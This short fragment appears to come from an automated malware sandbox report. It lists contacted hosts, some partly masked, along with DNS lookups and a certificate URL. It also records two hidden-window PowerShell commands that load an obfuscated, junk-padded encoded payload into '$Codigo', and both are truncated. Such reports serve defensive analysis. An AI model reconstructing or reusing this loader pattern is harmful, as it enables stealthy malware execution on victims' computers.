Technical Information
- 'im###upload.io':443
- 'pk#.goog':80
- http://pk#.goog/gsr1/gsr1.crt
- 'im###upload.io':443
- DNS ASK im###upload.io
- DNS ASK pk#.goog
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'JUKWpGQUSdxSBpUKWpGQUSdxSG0UKWpGQUSdxSYQBnUKWpGQUSdxSGUUKWpGQUSdxSVQByUKWpGQUSdxSGwUKWpGQUSdxSIUKWpGQUSdxSUKWpGQUSdxS9UKWpGQUSdxSCUKWpGQUSdxSUKWpGQUSdxSJwBoUKWpGQUSdxSHQUKW...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'JUKWpGQUSdxSBpUKWpGQUSdxSG0UKWpGQUSdxSYQBnUKWpGQUSdxSGUUKWpGQUSdxSVQByUKWpGQUSdxSGwUKWpGQUSdxSIUKWpGQUSdxSUKWpGQUSdxS9UKWpGQUSdxSCUKWpGQUSdxSUKWpGQUSdxSJwBoUKWpGQUSdxSHQUKW...